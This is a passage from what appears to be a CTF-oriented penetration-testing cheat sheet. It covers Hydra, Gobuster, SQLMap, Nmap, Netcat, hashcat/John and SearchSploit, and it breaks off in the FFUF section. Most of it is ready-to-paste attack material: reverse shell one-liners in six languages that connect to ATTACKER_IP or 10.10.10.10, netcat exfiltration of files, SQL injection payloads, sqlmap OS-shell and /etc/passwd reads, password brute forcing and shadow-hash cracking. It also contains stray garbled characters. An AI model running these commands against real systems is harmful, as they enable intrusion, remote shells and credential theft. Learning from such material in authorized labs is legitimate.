10.10.10.10 http-post-form \"/admin:user=^USER^&amp;pass=^PASS^:Login failed\"\n```\n\n**How to find the exact form parameters:**\n```bash\n# Use curl to see what the form looks like\ncurl -s http://10.10.10.10/login | grep -i \"form\\|input\\|type=\\\"password\\\"\"\n# Or use Burp Suite intercept to capture the POST request\n```\n\n#### Example 3: HTTP Basic Authentication\n\n```bash\n# Some servers use HTTP Basic Auth (popup login box, not a form page)\n# Target: http://10.10.10.10/manager/html (Tomcat)\nhydra -l admin -P pass.txt 10.10.10.10 http-get://10.10.10.10/manager/html/\n\n# For a realm-protected path:\nhydra -l admin -P pass.txt 10.10.10.10 http-get://10.10.10.10/protected/ -m \"Restricted\"\n```\n\n#### Example 4: FTP Anonymous Login Check\n\n```bash\n# Try to login as anonymous:anonymous\nhydra -l anonymous -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.10\n\n# Or just try empty password:\nhydra -l ftp -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.10\n```\n\n#### Example 5: SMB Login\n\n```bash\n# Try to access Windows share\nhydra -l administrator -P pass.txt smb://10.10.10.10\n\n# Also try null session:\nhydra -l '' -P '' smb://10.10.10.10\n```\n\n#### Example 6: Using User List + Password List (credential stuffing)\n\n```bash\n# When you have multiple possible users\nhydra -L users.txt -P passwords.txt ssh://10.10.10.10\n\n# Combine with loop detection (skip after 3 errors)\nhydra -L users.txt -P passwords.txt ssh://10.10.10.10 -V -t 4\n```\n\n#### Example 7: Try Password Same as Username\n\n```bash\n# CTF trick: password equals username\nhydra -L users.txt -e nsr ssh://10.10.10.10\n\n# -e nsr = try \"same as username\", \"empty password\", \"reverse username\"\n```\n\n### Hydra Quick Flags\n\n| Flag | Meaning |\n|------|---------|\n| `-l user` | Single username |\n| `-L file` | Username wordlist |\n| `-p pass` | Single password |\n| `-P file` | Password wordlist |\n| `-e nsr` | Try empty, same as user, reverse |\n| `-V` | Verbose output every attempt |\n| `-t 4` | 4 parallel connections (be nice) |\n| `-s PORT` | Non-default port |\n| `-o output.txt` | Save results to file |\n\n### Wordlists\n\n```bash\n# Standard CTF wordlists\n/usr/share/wordlists/rockyou.txt          # 14M passwords (\u89e3\u538b: gunzip rockyou.txt.gz)\n/usr/share/seclists/Passwords/Common-Creds/top-20-short.txt\n/usr/share/seclists/Usernames/top-500-users.txt\n\n# If rockyou is too big, use smaller ones:\nhead -1000 /usr/share/wordlists/rockyou.txt &gt; short.txt\n```\n\n---\n\n## 2. Gobuster &amp; Dirb - Web Directory Enumeration\n\n### What are they?\n\nDirectory brute-force tools that try common paths to find hidden files, admin panels, backups, and config files.\n\n**When to use:**\n- Web server has port 80/443 open\n- You see \"403 Forbidden\" or \"404 Not Found\" on most pages\n- You need to find /admin, /backup, /config, /phpmyadmin, /.git\n- Initial nmap scan shows nothing but HTTP\n\n**Installation:**\n```bash\napt-get install dirb               # Dirb (older, simpler)\ngo install github.com/OJ/gobuster@latest  # Gobuster (faster, more features)\n```\n\n### Real Usage Examples\n\n#### Example 1: Basic Gobuster Scan (most common)\n\n```bash\n# Standard directory scan\ngobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt\n\n# With extensions (for PHP, config files, backups)\ngobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt -x php,html,zip,bak\n\n# With cookie (if you need auth)\ngobuster dir -u http://10.10.10.10 -w wordlist.txt -c \"PHPSESSID=abc123\"\n\n# Scan HTTPS\ngobuster dir -u https://10.10.10.10 -w wordlist.txt -k\n\n# Output shows found directories with status codes:\n# /admin                (Status: 200)\n# /backup               (Status: 301)\n# /config.php           (Status: 200)\n# /.git                 (Status: 401)  \u2190 .git is often interesting!\n```\n\n#### Example 2: Finding Configuration Files (CTF goldmine)\n\n```bash\n# Config files often contain credentials, database passwords, API keys\ngobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt \\\n    -x php,ini,conf,config,bak,old,sql,json,xml,yaml,env\n\n# Look for:\n# config.php, config.inc, settings.php, database.php\n# .env (contains API keys and DB passwords!)\n# wp-config.php (WordPress)\n# admin/config.php\n```\n\n#### Example 3: Dirb Quick Scan\n\n```bash\n# Simpler alternative, scans with built-in wordlist\ndirb http://10.10.10.10/\n\n# With custom wordlist\ndirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt\n\n# Scan HTTPS with SSL ignore\ndirb https://10.10.10.10/ -S\n```\n\n#### Example 4: Enumerating Subdomains (DNS mode)\n\n```bash\n# If target is example.com, find subdomains\ngobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt\n\n# Common subdomains:\n# admin.example.com, dev.example.com, staging.example.com\n# api.example.com, internal.example.com\n```\n\n#### Example 5: Finding Admin Panels\n\n```bash\n# Common admin paths - try them all\ngobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt \\\n    -x php,html \\\n    -o admin_scan.txt &amp;\n\n# Then grep for 200 status results\ngrep \"Status: 200\" admin_scan.txt\n```\n\n### What to Look For in Results\n\n| Status | Meaning | CTF Value |\n|--------|---------|-----------|\n| 200 OK | Page exists | High - explore it |\n| 301/302 | Redirect | Medium - check where it goes |\n| 403 | Forbidden | Medium - might be directory listing |\n| 401 | Needs Auth | High - might have credentials in HTML comments |\n| 404 | Not found | Low - skip |\n\n### Common High-Value Paths\n\n```\n/admin/\n/backup/\n/config/\n/.env                     \u2190 Contains DB_PASS, API_KEY, JWT_SECRET\n/config.php\n/settings.php\n/db.sql\n/database.sql\n/wp-admin/                \u2190 WordPress admin\n/wp-login.php\n/phpmyadmin/\n/robots.txt               \u2190 Often lists hidden paths\n/.git/                    \u2190 Git repository (use git-dumper)\n/.svn/\n/api/\n/api/v1/\n/swagger/\n/upload/\n/uploads/\n/images/\n```\n\n---\n\n## 3. SQLMap - SQL Injection\n\n### What is SQLMap?\n\nAutomated SQL injection tool. It detects and exploits SQL injection vulnerabilities and can dump entire databases.\n\n**When to use:**\n- You see a URL like `/product.php?id=5` or `/search?q=test`\n- Login forms might be vulnerable\n- Any parameter that goes to the database\n- CTF has a \"find the admin password\" challenge\n\n**Installation:**\n```bash\napt-get install sqlmap\n# or\npip install sqlmap\n```\n\n### Real Usage Examples\n\n#### Example 1: Basic SQLi Detection (start here)\n\n```bash\n# Test a URL parameter for SQL injection\nsqlmap -u \"http://10.10.10.10/product.php?id=5\"\n\n# SQLMap will test various injection techniques and tell you if vulnerable:\n# Parameter: id (GET)\n# Type: boolean-based blind\n# Title: AND boolean-based blind\n# Payload: id=5 AND 3424=3424\n\n# If it asks \"\u7406 should I skip tests?\" \u2192 say N and let it continue\n# If it finds a vulnerability \u2192 it will ask if you want to exploit\n```\n\n#### Example 2: Get Database Banner (identify database type)\n\n```bash\n# After detecting vulnerability, get database version\nsqlmap -u \"http://10.10.10.10/product.php?id=5\" --batch --banner\n\n# Output:\n# [INFO] the back-end DBMS is MySQL &gt;= 5.0\n# [INFO] fetching banner\n# banner: '5.7.30-33-log'\n```\n\n#### Example 3: List All Databases\n\n```bash\n# If the parameter is vulnerable, enumerate databases\nsqlmap -u \"http://10.10.10.10/product.php?id=5\" --batch --dbs\n\n# Output:\n# available databases [2]:\n# [*] information_schema\n# [*] webapp_db\n```\n\n#### Example 4: Dump Specific Database Tables\n\n```bash\n# Get tables from webapp_db\nsqlmap -u \"http://10.10.10.10/product.php?id=5\" --batch \\\n    -D webapp_db --tables\n\n# Output:\n# Database: webapp_db\n# Table: users\n# Table: products\n# Table: orders\n\n# Dump the users table\nsqlmap -u \"http://10.10.10.10/product.php?id=5\" --batch \\\n    -D webapp_db -T users --dump\n\n# Output:\n# id | username | password | email |\n# 1  | admin   | f0a4cb...| admin@example.com |\n# 2  | john    | 5f4dcc...| john@example.com |\n```\n\n#### Example 5: SQL Injection in POST Request\n\n```bash\n# If the injection is in a POST body (like a login form)\nsqlmap -u \"http://10.10.10.10/login\" \\\n    --data=\"username=admin&amp;password=test\" \\\n    --batch --dbs\n\n# Or if the form uses JSON:\nsqlmap -u \"http://10.10.10.10/api/login\" \\\n    --data='{\"username\":\"admin\",\"password\":\"test\"}' \\\n    --batch --dbs\n```\n\n#### Example 6: Find SQLi in All Parameters (full scan)\n\n```bash\n# Let sqlmap auto-detect which parameter is vulnerable\nsqlmap -u \"http://10.10.10.10/search.php?q=test&amp;category=food&amp;price=100\" \\\n    --batch --dbs\n\n# Test all parameters\nsqlmap -u \"http://10.10.10.10/search.php\" \\\n    --data=\"q=test&amp;category=food\" \\\n    --batch --level=5 \\\n    --risk=3 \\\n    --dbs\n```\n\n#### Example 7: Interactive OS Shell (if DBA privileges)\n\n```bash\n# If sqlmap reports you are DBA, you can get shell access\nsqlmap -u \"http://10.10.10.10/product.php?id=5\" --os-shell\n\n# Or read files from the server\nsqlmap -u \"http://10.10.10.10/product.php?id=5\" --file-read=\"/etc/passwd\"\n```\n\n### SQLMap Risk Levels\n\n| Level | What it does |\n|-------|-------------|\n| `--risk=1` | Default, safe tests |\n| `--risk=2` | Includes heavy query tests |\n| `--risk=3` | Includes OR injection (can corrupt data) |\n\n| Level | What it tests |\n|-------|--------------|\n| `--level=1` | Test GET/POST parameters |\n| `--level=2` | Also test HTTP Cookie |\n| `--level=5` | Also test HTTP User-Agent/Referer |\n\n### Common CTF SQLi Payloads (manual, without sqlmap)\n\n```bash\n# Always-true condition (find vulnerable parameter)\n' OR '1'='1\n\" OR \"1\"=\"1\n' OR 1=1 --\n' OR 1=1 #\nadmin'--\n\n# Union-based (extract data from other tables)\n' UNION SELECT NULL,username,password FROM users--\n' UNION SELECT table_name,NULL FROM information_schema.tables--\n\n# Boolean-based blind (slow but works when no output)\n' AND (SELECT SUBSTR(password,1,1) FROM users WHERE username='admin')='a'--\n' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))&gt;100--\n\n# Time-based blind (no output at all)\n' AND SLEEP(5)--\n' AND (SELECT * FROM (SELECT SLEEP(5))a)--\n'; WAITFOR DELAY '00:00:05'--\n```\n\n---\n\n## 4. Nmap - Network Scanning\n\n### What is Nmap?\n\nNetwork scanner that discovers hosts and services on a network. First tool in every CTF reconnaissance phase.\n\n**When to use:**\n- You have a target IP or range\n- You need to find open ports and running services\n- You're looking for vulnerabilities in specific services\n- You need to know what version of software is running\n\n**Installation:**\n```bash\napt-get install nmap\n```\n\n### Real Usage Examples\n\n#### Example 1: Quick Scan (find what ports are open)\n\n```bash\n# Fast scan of top 100 ports\nnmap 10.10.10.10\n\n# Top 1000 ports\nnmap -F 10.10.10.10\n\n# Output:\n# PORT     STATE  SERVICE\n# 22/tcp   open   ssh\n# 80/tcp   open   http\n# 443/tcp  open   https\n# 3306/tcp open   mysql\n```\n\n#### Example 2: Full Port Scan (when you suspect hidden services)\n\n```bash\n# Scan ALL 65535 ports (takes longer)\nnmap -p- 10.10.10.10\n\n# Or scan a range\nnmap -p 1-1000 10.10.10.10\n```\n\n#### Example 3: Service Version Detection\n\n```bash\n# Find exact version of running services\nnmap -sV 10.10.10.10\n\n# Output:\n# PORT     STATE  SERVICE  VERSION\n# 22/tcp   open   ssh      OpenSSH 7.4 (protocol 2.0)\n# 80/tcp   open   http     Apache httpd 2.4.6 ((CentOS))\n# 443/tcp  open   ssl      OpenSSL 1.0.1e-fips\n\n# Use -sVV for more verbose version info\nnmap -sVV 10.10.10.10\n```\n\n#### Example 4: Aggressive Scan (everything at once)\n\n```bash\n# OS, version, scripts, traceroute - comprehensive but loud\nnmap -A 10.10.10.10\n\n# Warning: -A is very noisy and detectable by IDS\n```\n\n#### Example 5: Scan for Vulnerabilities (NSE scripts)\n\n```bash\n# Run all vulnerability scripts\nnmap --script vuln 10.10.10.10\n\n# Specific vulnerability scripts:\nnmap --script \"http-sql-injection,mysql-databases\" 10.10.10.10\n\n# Check for specific CVEs:\nnmap --script \"vuln-* and not dos\" 10.10.10.10\n\n# http-enum: find web directories\nnmap --script http-enum 10.10.10.10 -p 80\n\n# http-title: get page titles\nnmap --script http-title 10.10.10.10 -p 80,443\n```\n\n#### Example 6: HTTP Specific Scan (very useful for web CTFs)\n\n```bash\n# Get HTTP methods (useful for PUT/DELETE exploitation)\nnmap --script http-methods 10.10.10.10 -p 80\n\n# Find web server version and OS\nnmap -sV --script http-server-stats 10.10.10.10 -p 80\n\n# Try to enumerate users via Apache mod_status\nnmap --script http-auth 10.10.10.10 -p 80\n\n# Find default/error pages\nnmap --script http-errors 10.10.10.10 -p 80\n```\n\n#### Example 7: SSH/FTP/MySQL Brute Force Detection\n\n```bash\n# Check if you can enumerate FTP users\nnmap --script ftp-anon 10.10.10.10 -p 21\n\n# Check SSH encryption and banner\nnmap --script ssh2-enum-algos 10.10.10.10 -p 22\n\n# MySQL info\nnmap --script mysql-info 10.10.10.10 -p 3306\n```\n\n#### Example 8: Ping Sweep (find all live hosts in a range)\n\n```bash\n# No port scan, just find which hosts are up\nnmap -sn 10.10.10.0/24\n\n# Output:\n# Nmap scan report for 10.10.10.1:\n# Host is up (0.0012s latency).\n# Nmap scan report for 10.10.10.10:\n# Host is up (0.00051s latency).\n```\n\n#### Example 9: UDP Scan (find DNS, DHCP, SNMP services)\n\n```bash\n# Scan top 100 UDP ports\nnmap -sU --top-ports 100 10.10.10.10\n\n# UDP 53 (DNS), 161 (SNMP), 137/138 (NetBIOS)\nnmap -sU -p 53,161,137,138 10.10.10.10\n```\n\n#### Example 10: Output to File\n\n```bash\n# All formats\nnmap -oA scan_results 10.10.10.10\n\n# Normal output (readable)\nnmap -oN results.nmap 10.10.10.10\n\n# Grepable format (easy to parse with grep)\nnmap -oG results.grep 10.10.10.10\n\n# XML (for tools like Dradis)\nnmap -oX results.xml 10.10.10.10\n```\n\n### Nmap Quick Flags\n\n| Flag | Meaning | When to Use |\n|------|---------|-------------|\n| `-p-` | All 65535 ports | Suspect hidden service |\n| `-sV` | Version detection | Need to know software version |\n| `-sS` | SYN scan (stealth) | Avoid full connection |\n| `-sT` | TCP connect | No root privileges |\n| `-sU` | UDP scan | Find DNS/SNMP services |\n| `-A` | Aggressive | Everything at once |\n| `-O` | OS detection | Need OS info |\n| `-Pn` | No ping | Host is blocking pings |\n| `-sn` | Ping only | Find live hosts |\n| `--script vuln` | Vuln scan | Find CVEs |\n| `-T4` | Faster | Need speed |\n| `-oA` | All outputs | Save everything |\n\n### Common Nmap Service Patterns in CTFs\n\n```bash\n# Web server \u2192 check for SQLi, LFI, RCE\nnmap -sV --script http* 10.10.10.10 -p 80,443,8080\n\n# SMB (Windows) \u2192 check for MS17-010 (EternalBlue)\nnmap --script smb-vuln* 10.10.10.10 -p 445\n\n# Redis \u2192 often no auth, check for RCE\nnmap -sV --script redis-info 10.10.10.10 -p 6379\n\n# Docker API \u2192 RCE via docker socket\nnmap --script docker-version,docker-api 10.10.10.10 -p 2375\n```\n\n---\n\n## 5. Netcat &amp; Reverse Shells\n\n### What is Netcat?\n\nNetwork Swiss Army knife. Read/write TCP/UDP connections. Used for reverse shells, file transfer, banner grabbing, port scanning.\n\n**When to use:**\n- You found an RCE (Remote Code Execution) vulnerability\n- You need to transfer files between machines\n- You want to test if a port is open\n- You need a quick way to get shell access\n\n**Installation:**\n```bash\napt-get install netcat\n# or nc-openbsd on some systems\n```\n\n### Real Usage Examples\n\n#### Example 1: Reverse Shell (attacker listens, victim connects back)\n\n```bash\n# STEP 1: Attacker listens on their machine (Kali)\nnc -lvnp 4444\n\n# STEP 2: Victim connects back to attacker\n# On victim, depending on what's available:\n\n# Bash reverse shell (most common)\nbash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1\n\n# Python reverse shell\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'\n\n# PHP reverse shell\nphp -r '$s=fsockopen(\"ATTACKER_IP\",4444);exec(\"/bin/bash -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'\n\n# Perl reverse shell\nperl -e 'use Socket;$i=\"ATTACKER_IP\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&gt;&amp;S\");open(STDOUT,\"&gt;&amp;S\");open(STDERR,\"&gt;&amp;S\");exec(\"/bin/bash -i\");};'\n\n# One-liner (all in one line)\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc ATTACKER_IP 4444 &gt;/tmp/f\n```\n\n#### Example 2: Bind Shell (victim listens, attacker connects)\n\n```bash\n# On victim (less common in CTFs, usually NAT blocks this)\nnc -lvnp 4444 -e /bin/bash\n\n# On attacker\nnc VICTIM_IP 4444\n```\n\n#### Example 3: File Transfer (no SCP/FTP needed)\n\n```bash\n# Victim has a file you want (linpeas.sh, password database, etc.)\n# Attacker:\nnc -lvnp 4444 &gt; output_file.txt\n\n# Victim:\nnc ATTACKER_IP 4444 &lt; /path/to/file.txt\n\n# Or reverse: attacker sends file to victim\n# Victim:\nnc -lvnp 4444 &gt; received_file.txt\n\n# Attacker:\nnc VICTIM_IP 4444 &lt; file_to_send.txt\n```\n\n#### Example 4: Banner Grabbing (identify service version)\n\n```bash\n# Grab SSH banner\nnc 10.10.10.10 22\n# Output: SSH-2.0-OpenSSH_7.4\n\n# Grab HTTP header\nnc 10.10.10.10 80\nHEAD / HTTP/1.0\n\n# Grab FTP banner\nnc 10.10.10.10 21\n# Output: 220 (vsFTPd 3.0.3)\n\n# Grab SMTP banner\nnc 10.10.10.10 25\n# Output: 220 mail.example.com ESMTP\n```\n\n#### Example 5: Port Scanning with Netcat (when nmap not available)\n\n```bash\n# Check if port is open\nnc -zv 10.10.10.10 80\n# Output: Connection succeeded!\n\n# Scan range of ports\nfor port in 80 443 22 3306 8080; do\n    nc -zv -w 1 10.10.10.10 $port 2&gt;&amp;1 | grep succeeded\ndone\n\n# Full port scan (slow)\nnc -zv 10.10.10.10 1-1000 2&gt;&amp;1 | grep succeeded\n```\n\n#### Example 6: Chat (quick communication between two machines)\n\n```bash\n# Machine 1:\nnc -lp 4444\n\n# Machine 2:\nnc MACHINE1_IP 4444\n# Now both sides can type and see each other's messages\n```\n\n#### Example 7: Upgrade to PTY Shell (better interactive shell)\n\n```bash\n# After getting basic reverse shell, upgrade to full PTY\n# On victim shell:\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n# Or:\nscript -qc /bin/bash /dev/null\n\n# Then press Ctrl+Z to background\n# On attacker machine:\nstty raw -echo; fg\n# This gives you a fully interactive terminal\n```\n\n### Reverse Shell Cheat Sheet (copy-paste for CTF)\n\n```\n# Always have these ready in a text file\n\n# Bash\nbash -i &gt;&amp; /dev/tcp/10.10.10.10/4444 0&gt;&amp;1\n\n# Python\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.10.10.10\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'\n\n# PHP\nphp -r '$s=fsockopen(\"10.10.10.10\",4444);exec(\"/bin/bash -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'\n\n# Perl\nperl -e 'use Socket;$i=\"10.10.10.10\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&gt;&amp;S\");open(STDOUT,\"&gt;&amp;S\");open(STDERR,\"&gt;&amp;S\");exec(\"/bin/bash -i\");};'\n\n# Ruby\nruby -rsocket -e'f=TCPSocket.open(\"10.10.10.10\",4444).to_i;exec sprintf(\"/bin/bash -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d\",f,f,f)'\n\n# Java\nr = Runtime.getRuntime();p = r.exec([\"/bin/bash\",\"-c\",\"exec 5&lt;&gt;/dev/tcp/10.10.10.10/4444;cat &lt;&amp;5 | while read line;do \\$line 2&gt;&amp;5 &gt;&amp;5;done\"] as String[]);p.waitFor()\n```\n\n---\n\n## 6. Hashcat &amp; John - Hash Cracking\n\n### What are they?\n\nHashcat and John the Ripper (John) are password hash crackers. Use them when you find a hash and need to find the original password.\n\n**When to use:**\n- You found a password hash in a database dump\n- You found /etc/shadow and need to crack root password\n- You have an NTLM hash from LSASS dump\n- CTF gives you a hash and says \"crack this\"\n\n**Installation:**\n```bash\napt-get install hashcat john\n# or\nbrew install hashcat john\n```\n\n### Hashcat vs John\n\n| Tool | Best For | GPU Support | Format |\n|------|----------|-------------|--------|\n| Hashcat | Fast GPU cracking, many hash types | Yes (much faster) | `-m MODE` |\n| John | CPU, many formats, easy to use | Limited | `--format=` |\n\n### Hashcat Real Examples\n\n#### Example 1: Crack MD5 Hash\n\n```bash\n# Hash type 0 = MD5\n# Save hash to file\necho \"5f4dcc3b5aa765d61d8327deb882cf99\" &gt; hash.txt\n\n# Crack with wordlist\nhashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt\n\n# If you have multiple GPUs:\nhashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt -d 1,2\n\n# Show results\nhashcat -m 0 hash.txt --show\n```\n\n#### Example 2: Crack SHA256 Hash\n\n```bash\n# Hash type 1400 = SHA256\nhashcat -m 1400 hash.txt wordlist.txt\n\n# If it says \"Token length exception\" \u2192 hash has salt, try different format\n```\n\n#### Example 3: Crack NTLM Hash (Windows password)\n\n```bash\n# Hash type 1000 = NTLM\n# Common from Metasploit/Responder/LSASS\nhashcat -m 1000 hash.txt wordlist.txt\n\n# Example NTLM hash format:\n# admin:1000:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::\n```\n\n#### Example 4: Crack WordPress Hash (MD5 with salt)\n\n```bash\n# WordPress uses MD5($salt.$pass)\n# Hash type 2611 = MD5(Wordpress)\nhashcat -m 2611 hash.txt wordlist.txt\n```\n\n#### Example 5: Crack Linux /etc/shadow Hash\n\n```bash\n# Format: $6$salt$hash (SHA-512)\n# Hash type 1800 = sha512crypt\nhashcat -m 1800 hash.txt wordlist.txt\n\n# If combined with passwd file, first extract:\n# root:$6$salt$hash:...\njohn --format=sha512crypt passwd.txt --wordlist=rockyou.txt\n```\n\n#### Example 6: Show Hashcat Hash Types\n\n```bash\n# List all hash modes\nhashcat --help | grep -A 2000 \"Hash modes\"\n\n# Or:\nhashcat -m 0 --help | head -50\n\n# Common ones:\n# 0     MD5\n# 100   SHA1\n# 1400  SHA256\n# 1700  SHA512\n# 1000  NTLM\n# 131   MySQL323\n# 200   MySQL4.1/SHA1\n# 3200  bcrypt\n# 5600  NetNTLMv2\n# 13100 Kerberoas\n# 18200 AS-REP\n```\n\n### John the Ripper Real Examples\n\n#### Example 1: Crack Basic Hash\n\n```bash\n# Simple\njohn --wordlist=/usr/share/wordlists/rockyou.txt hash.txt\n\n# Show results\njohn --show hash.txt\n```\n\n#### Example 2: Auto-detect Hash Type\n\n```bash\n# John auto-detects most common formats\njohn hash.txt\n\n# Or with wordlist\njohn --wordlist=rockyou.txt hash.txt\n```\n\n#### Example 3: Crack /etc/shadow (passwd + shadow combo)\n\n```bash\n# First get both /etc/passwd and /etc/shadow\n# Combine them (unshadow)\nunshadow passwd.txt shadow.txt &gt; combined.txt\n\n# Then crack\njohn --format=sha512crypt combined.txt --wordlist=rockyou.txt\n```\n\n#### Example 4: Crack SSH Key Password\n\n```bash\n# Sometimes SSH private keys are encrypted\njohn --format=SSH ssh_key_hash.txt --wordlist=rockyou.txt\n\n# Or use ssh2john to convert:\npython3 /usr/share/john/ssh2john.py id_rsa &gt; hash.txt\njohn --wordlist=rockyou.txt hash.txt\n```\n\n#### Example 5: Show John Formats\n\n```bash\njohn --list=formats | grep -i \"md5\\|sha\\|ntlm\\|mysql\"\n```\n\n### Common Hash Formats by System\n\n| System | Hash Format | Hashcat Mode | John Format |\n|--------|-------------|--------------|-------------|\n| MD5 | `5f4dcc3b5aa765d61d8327deb882cf99` | `-m 0` | `raw-md5` |\n| SHA1 | `5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8` | `-m 100` | `raw-sha1` |\n| SHA256 | `e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855` | `-m 1400` | `raw-sha256` |\n| SHA512 | `$6$salt$hash...` | `-m 1800` | `sha512crypt` |\n| NTLM | `aad3b435b51404eeaad3b435b51404ee:5f4dcc3b...` | `-m 1000` | `ntlm` |\n| MySQL | `*5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8` | `-m 200` | `mysql` |\n| bcrypt | `$2a$...` | `-m 3200` | `bcrypt` |\n| NetNTLMv2 | `MACHINENAME::DOMAIN:hash...` | `-m 5600` | `netntlmv2` |\n\n### Rules-based Cracking (when wordlist fails)\n\n```bash\n# Hashcat rules: capitalize, append numbers, leet speak\nhashcat -m 0 hash.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule\n\n# John rules\njohn --wordlist=rockyou.txt --rules=NT hash.txt\n```\n\n---\n\n## 7. SearchSploit - Exploit Search\n\n### What is SearchSploit?\n\nCommand-line search for Exploit-DB, the largest database of public exploits. Every CTF VM runs outdated software with known vulnerabilities.\n\n**When to use:**\n- Nmap shows version like \"Apache 2.4.6\"\n- You need to find an exploit for a specific CVE\n- You have software name + version\n- You found a vulnerable service and need RCE\n\n**Installation:**\n```bash\napt-get install exploitdb\n# Update database\nsearchsploit -u\n```\n\n### Real Usage Examples\n\n#### Example 1: Search by Software Name\n\n```bash\n# Find exploits for Apache\nsearchsploit apache\n\n# Find exploits for WordPress\nsearchsploit wordpress\n\n# Find exploits for SMB\nsearchsploit smb\n\n# Find exploits for MySQL\nsearchsploit mysql\n```\n\n#### Example 2: Search by Version\n\n```bash\n# Apache 2.4.6 exploits\nsearchsploit \"apache 2.4\"\n\n# PHP 7.4 RCE\nsearchsploit \"php 7.4\"\n```\n\n#### Example 3: Search by CVE\n\n```bash\n# Search for specific CVE\nsearchsploit CVE-2021-44228\n# Finds: Apache Log4j2 (Log4Shell) RCE\n\n# Also:\nsearchsploit 2021-44228\n```\n\n#### Example 4: Get Exploit Source Code\n\n```bash\n# Show full path to exploit file\nsearchsploit -p 50689\n# Output: /usr/share/exploitdb/exploits/linux/remote/50689.py\n\n# Copy exploit to current directory\nsearchsploit -m 50689\n\n# Or use full path to read:\ncat /usr/share/exploitdb/exploits/linux/remote/50689.py\n```\n\n#### Example 5: Mirror All Exploits for a Software\n\n```bash\n# Copy all PHP exploits to current directory\nsearchsploit php --mirror &gt; php_exploits.txt\n\n# Get remote exploits only\nsearchsploit -s \"remote code execution\" --nmap\n```\n\n### Common CTF Exploit-DB Searches\n\n```bash\n# Find RCE exploits\nsearchsploit \"remote code execution\"\nsearchsploit \"remote command execution\"\n\n# Find LFI/RFI exploits\nsearchsploit \"local file inclusion\"\nsearchsploit \"file inclusion\"\n\n# Find SQL injection\nsearchsploit \"sql injection\"\n\n# Find privesc (privilege escalation)\nsearchsploit \"privilege escalation\"\nsearchsploit \"local privilege escalation\"\n\n# Find kernel exploits\nsearchsploit \"kernel exploit\"\n```\n\n### From Nmap to Exploit (workflow)\n\n```bash\n# 1. Scan target\nnmap -sV 10.10.10.10\n\n# Output shows:\n# 22/tcp   open  ssh      OpenSSH 7.4 (protocol 2.0)\n# 80/tcp   open  http     Apache httpd 2.4.6\n# 445/tcp  open  smb      Samba smbd 4.6.2\n\n# 2. Search for exploits\nsearchsploit \"OpenSSH 7.4\"\nsearchsploit \"apache 2.4.6\"\nsearchsploit \"samba 4.6\"\n\n# 3. Get the exploit\nsearchsploit -p EXPLOIT_ID\npython3 /path/to/exploit.py\n```\n\n### Alternative: Finding Exploits Online\n\n```bash\n# Searchsploit uses offline database, but you can also:\n# 1. searchsploit online (uses Google)\nsearchsploit -w \"wordpress 5.7\"\n\n# 2. Use Google dorking:\n# site:exploit-db.com \"apache 2.4.6\"\n# site:github.com \"CVE-2021-44228\"\n\n# 3. Use rapid7 CVE database:\n# https://www.rapid7.com/db/\n```\n\n---\n\n## 8. FFUF - Web Fuzzing\n\n### What is FFUF?\n\nFast web fuzzing tool. Replaces dirbuster/gobuster for speed. Tests thousands of paths/parameters per second.\n\n**When to use:**\n- Need to find hidden paths, parameters, or values\n- Login forms need parameter fuzzing\n- Subdomain enumeration\n- When you need speed over all features\n\n**Installation:**\n```bash\napt-get install ffuf\n# or\ngo install github.com/ffuf/ffuf@latest\n```\n\n### Real Usage Examples\n\n#### Example 1: Directory Fuzzing (replaces gobuster)\n\n```bash\n# Basic directory scan\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.10/FUZZ\n\n# With extensions (FUZZ keyword in URL gets replaced)\nffuf -w wordlist.txt -u http://10.10.10.10/FUZZ.php\n\n# Multiple extensions\nffuf -w wordlist.txt -u http://10.10.10.10/FUZZ \\\n    -e .php,.html,.txt,.bak\n\n# Show only results with status 200 (hide 404, 403)\nffuf -w wordlist.txt -u http://10.10.10.10/FUZZ \\\n    -mc 200\n\n# Or show specific status codes:\nffuf -w wordlist.txt -u http://10.10.10.10/FUZZ \\\n    -mc 200,301,302\n\n# Quiet mode (only show found):\nffuf -w wordlist.txt -u http://10.10.10.10/FUZZ -c\n```\n\n#### Example 2: Parameter Fuzzing (find GET parameters)\n\n```bash\n# Find parameters like ?id=, ?page=, ?admin=\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt \\\n    -u \"http://10.10.10.10/index.php?FUZZ=test\"\n\n# Then fuzz the parameter value\nffuf -w wordlist.txt \\\n    -u \"http://10.10.10.10/index.php?id=FUZZ\"\n```\n\n#### Example 3: Subdomain 